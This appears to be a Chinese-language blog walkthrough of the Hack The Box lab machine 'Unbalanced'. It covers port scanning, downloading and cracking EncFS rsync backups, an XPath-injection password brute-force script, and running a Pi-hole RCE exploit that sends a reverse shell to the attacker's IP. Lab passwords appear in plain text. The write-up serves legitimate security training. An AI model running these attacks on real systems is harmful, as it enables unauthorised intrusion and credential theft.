基本信息

https://www.hackthebox.eu/home/machines/profile/268
10.10.10.200

端口扫描

22,873,3128

$ nmap -sC -sV 10.10.10.200

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 13:26 CST
Nmap scan report for 10.10.10.200
Host is up (0.078s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 a2:76:5c:b0:88:6f:9e:62:e8:83:51:e7:cf:bf:2d:f2 (RSA)
|   256 d0:65:fb:f6:3e:11:b1:d6:e6:f7:5e:c0:15:0c:0a:77 (ECDSA)
|_  256 5e:2b:93:59:1d:49:28:8d:43:2c:c1:f7:e3:37:0f:83 (ED25519)
873/tcp  open  rsync      (protocol version 31)
3128/tcp open  http-proxy Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.66 seconds

873 rsync

873是rsync端口，未授权访问，可以下载文件：

$ rsync rsync://10.10.10.200
conf_backups   	EncFS-encrypted configuration backups

$ rsync -av rsync://10.10.10.200/conf_backups files
receiving file list ... done
created directory files
./
,CBjPJW4EGlcqwZW4nmVqBA6
-FjZ6-6,Fa,tMvlDsuVAO7ek
.encfs6.xml
0K72OfkNRRx3-f0Y6eQKwnjn
27FonaNT2gnNc3voXuKWgEFP4sE9mxg0OZ96NB0x4OcLo-
2VyeljxHWrDX37La6FhUGIJS
3E2fC7coj5,XQ8LbNXVX9hNFhsqCjD-g3b-7Pb5VJHx3C1
3cdBkrRF7R5bYe1ZJ0KYy786
3xB4vSQH-HKVcOMQIs02Qb9,
4J8k09nLNFsb7S-JXkxQffpbCKeKFNJLk6NRQmI11FazC1
5-6yZKVDjG4n-AMPD65LOpz6-kz,ae0p2VOWzCokOwxbt,
5FTRnQDoLdRfOEPkrhM2L29P
5IUA28wOw0wwBs8rP5xjkFSs
6R1rXixtFRQ5c9ScY8MBQ1Rg
7-dPsi7efZRoXkZ5oz1AxVd-Q,L05rofx0Mx8N2dQyUNA,
7zivDbWdbySIQARaHlm3NbC-7dUYF-rpYHSQqLNuHTVVN1
8CBL-MBKTDMgB6AT2nfWfq-e
8XDA,IOhFFlhh120yl54Q0da
8e6TAzw0xs2LVxgohuXHhWjM
9F9Y,UITgMo5zsWaP1TwmOm8EvDCWwUZurrL0TwjR,Gxl0
A4qOD1nvqe9JgKnslwk1sUzO
Acv0PEQX8vs-KdK307QNHaiF
B6J5M3OP0X7W25ITnaZX753T
Chlsy5ahvpl5Q0o3hMyUIlNwJbiNG99DxXJeR5vXXFgHC1
ECXONXBBRwhb5tYOIcjjFZzh
F4F9opY2nhVVnRgiQ,OUs-Y0
FGZsMmjhKz7CJ2r-OjxkdOfKdEip4Gx2vCDI24GXSF5eB1
FSXWRSwW6vOvJ0ExPK0fXJ6F
IymL3QugM,XxLuKEdwJJOOpi
KPYfvxIoOlrRjTY18zi8Wne-
Kb-,NDTgYevHOGdHCYsSQhhIHrUGjiM6i2JZcl,-PKAJm0
Kpo3MHQxksW2uYX79XngQu-f
KtFc,DR7HqmGdPOkM2CpLaM9
Mv5TtpmUNnVl-fgqQeYAy8uu
MxgjShAeN6AmkH2tQAsfaj6C
Ni8LDatT134DF6hhQf5ESpo5
Nlne5rpWkOxkPNC15SEeJ8g,
OFG2vAoaW3Tvv1X2J5fy4UV8
OvBqims-kvgGyJJqZ59IbGfy
StlxkG05UY9zWNHBhXxukuP9
TZGfSHeAM42o9TgjGUdOSdrd
VQjGnKU1puKhF6pQG1aah6rc
W5,ILrUB4dBVW-Jby5AUcGsz
Wr0grx0GnkLFl8qT3L0CyTE6
X93-uArUSTL,kiJpOeovWTaP
Ya30M5le2NKbF6rD-qD3M-7t
Yw0UEJYKN,Hjf-QGqo3WObHy
Z8,hYzUjW0GnBk1JP,8ghCsC
ZXUUpn9SCTerl0dinZQYwxrx
ZvkMNEBKPRpOHbGoefPa737T
a4zdmLrBYDC24s9Z59y-Pwa2
c9w3APbCYWfWLsq7NFOdjQpA
cwJnkiUiyfhynK2CvJT7rbUrS3AEJipP7zhItWiLcRVSA1
dF2GU58wFl3x5R7aDE6QEnDj
dNTEvgsjgG6lKBr8ev8Dw,p7
gK5Z2BBMSh9iFyCFfIthbkQ6
gRhKiGIEm4SvYkTCLlOQPeh-
hqZXaSCJi-Jso02DJlwCtYoz
iaDKfUAHJmdqTDVZsmCIS,Bn
jIY9q65HMBxJqUW48LJIc,Fj
kdJ5whfqyrkk6avAhlX-x0kh
kheep9TIpbbdwNSfmNU1QNk-
l,LY6YoFepcaLg67YoILNGg0
lWiv4yDEUfliy,Znm17Al41zi0BbMtCbN8wK4gHc333mt,
mMGincizgMjpsBjkhWq-Oy0D
oPu0EVyHA6,KmoI1T,LTs83x
pfTT,nZnCUFzyPPOeX9NwQVo
pn6YPUx69xqxRXKqg5B5D2ON
q5RFgoRK2Ttl3U5W8fjtyriX
qeHNkZencKDjkr3R746ZzO5K
sNiR-scp-DZrXHg4coa9KBmZ
sfT89u8dsEY4n99lNsUFOwki
uEtPZwC2tjaQELJmnNRTCLYU
vCsXjR1qQmPO5g3P3kiFyO84
waEzfb8hYE47wHeslfs1MvYdVxqTtQ8XGshJssXMmvOsZLhtJWWRX31cBfhdVygrCV5

sent 1672 bytes  received 411883 bytes  35961.30 bytes/sec
total size is 405603  speedup is 0.98

这是EncFS加密后的文件：

https://github.com/vgough/encfs

3128 proxy

3128是一个代理，直接访问是错误页面：

将其作为代理使用：

EncFS

解密密码

解密需要密码，可以使用john：

python /usr/share/john/encfs2john.py files/ > encfs6.xml.john

sudo john --wordlist=/usr/share/wordlists/rockyou.txt  encfs6.xml.john
[sudo] password for miao:
Using default input encoding: UTF-8
Loaded 1 password hash (EncFS [PBKDF2-SHA1 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 580280 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bubblegum        (files/)
1g 0:00:00:17 DONE (2020-08-19 10:53) 0.05707g/s 41.09p/s 41.09c/s 41.09C/s bambam..marissa
Use the "--show" option to display all of the cracked passwords reliably
Session completed

得到解密密码是bubblegum

解密文件

sudo apt-get install encfs

encfsctl export files decrypt
EncFS Password:
directory decrypt does not exist.
The directory "decrypt" does not exist. Should it be created? (y,N) Y

解密后的文件是各种配置文件：

squid.conf

在squid.conf中找到一个域名和密码：

1 2	intranet.unbalanced.htb Thah$Sh1

squid

通过squid，我们可以得到更多信息

sudo apt install squidclient

squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:fqdncache
HTTP/1.1 200 OK
Server: squid/4.6
Mime-Version: 1.0
Date: Thu, 20 Aug 2020 05:53:53 GMT
Content-Type: text/plain;charset=utf-8
Expires: Thu, 20 Aug 2020 05:53:53 GMT
Last-Modified: Thu, 20 Aug 2020 05:53:53 GMT
X-Cache: MISS from unbalanced
X-Cache-Lookup: MISS from unbalanced:3128
Via: 1.1 unbalanced (squid/4.6)
Connection: close

FQDN Cache Statistics:
FQDNcache Entries In Use: 9
FQDNcache Entries Cached: 8
FQDNcache Requests: 94
FQDNcache Hits: 0
FQDNcache Negative Hits: 0
FQDNcache Misses: 94
FQDN Cache Contents:

Address                                       Flg TTL Cnt Hostnames
127.0.1.1                                       H -001   2 unbalanced.htb unbalanced
::1                                             H -001   3 localhost ip6-localhost ip6-loopback
172.31.179.2                                    H -001   1 intranet-host2.unbalanced.htb
172.31.179.3                                    H -001   1 intranet-host3.unbalanced.htb
127.0.0.1                                       H -001   1 localhost
172.17.0.1                                      H -001   1 intranet.unbalanced.htb
ff02::1                                         H -001   1 ip6-allnodes
ff02::2                                         H -001   1 ip6-allrouters

intranet

根据squid配置文件得到的一些域名,可以猜到这是类似负载均衡，第一个域名就是172.31.179.1：

1
2
3

intranet.unbalanced.htb
172.31.179.2                                    H -001   1 intranet-host2.unbalanced.htb
172.31.179.3                                    H -001   1 intranet-host3.unbalanced.htb

直接通过代理访问ip得到：

配置hosts：

1
2
3

172.31.179.1 intranet.unbalanced.htb
172.31.179.2 intranet-host2.unbalanced.htb
172.31.179.3 intranet-host3.unbalanced.htb

然后通过域名去访问，是一个登录页面：

这时候把域名换成ip就可以正常访问了，后面路径正确：

X-Path注入

简单尝试可以发现有明显的注入，但不是SQL注入，而是X-Path注入,最简单的payload即可，得到一部分信息：

参考资料：

[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH Injection)

bruteforce

之后就是根据得到的用户信息，通过xpath注入爆破，得到结果：

rita:password01!
jim:stairwaytoheaven
bryan:ireallyl0vebubblegum!!!
sarah:sarah4evah

爆破脚本

import requests

url = "http://172.31.179.1/intranet.php"
proxy = "http://10.10.10.200:3128"
letters = "abcdefghijklmnopqrstuvwxyz0123456789!@#$%"
users = ['sarah', 'rita', 'jim', 'bryan']

for user in users:
    data = {"Username": '', "Password": "' or username= '" + user + "'or substring(Password,1,1)='p' or'"}
    request = requests.post(url, data=data, proxies={'http':proxy})    
    length = len(request.text)    
    p4ss = ''
    for i in range(1,25):        
        for l in letters:            
            data = {"Username": '', "Password": "' or username= '" + "{}".format(user) + "'or substring(Password,{},1)='{}' or'".format(str(i),l)}
            request1 = requests.post(url, data=data, proxies={'http':proxy})
            if "{}@unbalanced.htb".format(user) in request1.text and len(request1.text) != 6756:
                print("Got hit for User '{}' - Letter is '{}'".format(user, l))
                p4ss += l
                print(str(i))
                print(str(p4ss))
                pass

user flag

上面爆破得到的账号密码，bryan的可以ssh登录，得到user.txt:

搜集信息

bryan@unbalanced:~$ cat TODO
############
# Intranet #
############
* Install new intranet-host3 docker [DONE]
* Rewrite the intranet-host3 code to fix Xpath vulnerability [DONE]
* Test intranet-host3 [DONE]
* Add intranet-host3 to load balancer [DONE]
* Take down intranet-host1 and intranet-host2 from load balancer (set as quiescent, weight zero) [DONE]
* Fix intranet-host2 [DONE]
* Re-add intranet-host2 to load balancer (set default weight) [DONE]
- Fix intranet-host1 [TODO]
- Re-add intranet-host1 to load balancer (set default weight) [TODO]

###########
# Pi-hole #
###########
* Install Pi-hole docker (only listening on 127.0.0.1) [DONE]
* Set temporary admin password [DONE]
* Create Pi-hole configuration script [IN PROGRESS]
- Run Pi-hole configuration script [TODO]
- Expose Pi-hole ports to the network [TODO]

注意这一行,下一步的提示：

1	Create Pi-hole configuration script [IN PROGRESS]

使用 linpeas之类的可以得到一些docker的ip地址：

172.31.179.2 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:b3:02 STALE
172.31.11.3 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:0b:03 STALE
172.31.179.1 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:b3:01 STALE
172.31.179.3 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:b3:03 STALE
10.10.10.2 dev ens160 lladdr 00:50:56:b9:f9:ab REACHABLE
fe80::250:56ff:feb9:f9ab dev ens160 lladdr 00:50:56:b9:f9:ab router STALE

172.31.11.3是Pi-hole:

bryan@unbalanced:~$ curl 172.31.11.3

    <html><head>
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
        <link rel='stylesheet' href='/pihole/blockingpage.css' type='text/css'/>
    </head><body id='splashpage'><img src='/admin/img/logo.svg'/><br/>Pi-<b>hole</b>: Your black hole for Internet advertisements<br><a href='/admin'>Did you mean to go to the admin panel?</a></body></html>

可以在外部通过代理访问：

Pi-hole

搜索能够得到一个需要认证的RCE：

Pi-hole < 4.4 - Authenticated Remote Code Execution - Linux webapps Exploit
https://www.exploit-db.com/exploits/48442

直接使用默认密码admin即可登录：

端口转发

因为exp没有配置代理选项，而这个pihole是需要通过代理访问的，我们可以把端口转发出来方便操作：

1	ssh -L 8181:172.31.11.3:80 bryan@10.10.10.200

然后访问我们本机的8181端口就相当于访问远程pihole：

rce

然后就是exp直接打，反弹shell：

exp用的这个：

https://github.com/AndreyRainchik/CVE-2020-8816

1	python CVE-2020-8816.py http://127.0.0.1:8181 admin 10.10.14.17 9999

得到www-root的shell：

pihole_config.sh

然后在/root目录下有个配置文件，在里面有一个密码：

$ cd /root
$ ls
ph_install.sh
pihole_config.sh
$ cat pihole_config.sh
#!/bin/bash

# Add domains to whitelist
/usr/local/bin/pihole -w unbalanced.htb
/usr/local/bin/pihole -w rebalanced.htb

# Set temperature unit to Celsius
/usr/local/bin/pihole -a -c

# Add local host record
/usr/local/bin/pihole -a hostrecord pihole.unbalanced.htb 127.0.0.1

# Set privacy level
/usr/local/bin/pihole -a -l 4

# Set web admin interface password
/usr/local/bin/pihole -a -p 'bUbBl3gUm$43v3Ry0n3!'

# Set admin email
/usr/local/bin/pihole -a email admin@unbalanced.htb
$

root txt

上面得到的密码就是root密码，外部直接切到root，得到root.txt:

1	bUbBl3gUm$43v3Ry0n3!

参考资料

https://github.com/vgough/encfs
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH Injection)
Pi-hole < 4.4 - Authenticated Remote Code Execution - Linux webapps Exploit
https://www.exploit-db.com/exploits/48442
https://github.com/AndreyRainchik/CVE-2020-8816
Hack-The-Box-walkthrough[Unbalanced] | lUc1f3r11’s blog
https://fdlucifer.github.io/2020/08/17/Unbalanced/
HackTheBox - Unbalanced 10.10.10.200 - WriteUp - BinaryBiceps
https://binarybiceps.com/hackthebox-unbalanced-writeup/?ppwp=1#Privilege_Escalation_%E2%80%93_Information_Disclosure_%E2%80%93_Root

Unbalanced - HackTheBox

2020-08-20